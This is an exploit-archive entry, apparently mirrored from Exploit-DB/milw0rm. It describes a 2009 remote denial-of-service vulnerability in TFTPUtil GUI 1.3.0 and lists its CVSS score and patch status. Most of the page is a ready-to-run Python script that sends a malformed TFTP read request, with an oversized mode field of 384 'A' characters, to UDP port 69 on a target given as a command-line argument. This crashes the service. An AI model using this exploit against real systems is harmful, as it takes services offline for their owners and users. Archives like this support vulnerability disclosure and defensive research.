header-logo
Suggest Exploit
vendor:
TFTPUtil
by:
ThE g0bL!N
7,8
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: TFTPUtil
Affected Version From: 1.3.0
Affected Version To: 1.3.0
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

TFTPUtil GUI 1.3.0 GUI Remote Denial Of Service Exploit

This exploit is for TFTPUtil GUI 1.3.0 GUI Remote Denial Of Service vulnerability. It sends a crafted payload of 384 A characters to the target system on port 69. This causes the application to crash.

Mitigation:

N/A
Source

Exploit-DB raw data:

#!/usr/bin/python

import socket
import sys
from time import *

#Download:http://www.brothersoft.com/tftputil-131537.html
#Note; Good Ramadan For all MuSLimS
if len(sys.argv)!=2:
 print "[x]TFTPUtil GUI 1.3.0 GUI Remote Denial Of Service Exploit"
 print "[x]Author : ThE g0bL!N"
 print "[x]Big Thanx : His0k4\n"
 print "[+]Usage: %s <target_ip>" %sys.argv[0]
 sys.exit(0)

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

mode = "\x41"*384

filename = "test"

payload = "\x00\x01" + filename + "\x00" + mode + "\x00"

print "[x] Sending the payload..."
sleep(2)
s.sendto(payload, (sys.argv[1], 69))
print "[x] Done!"

# milw0rm.com [2009-08-26]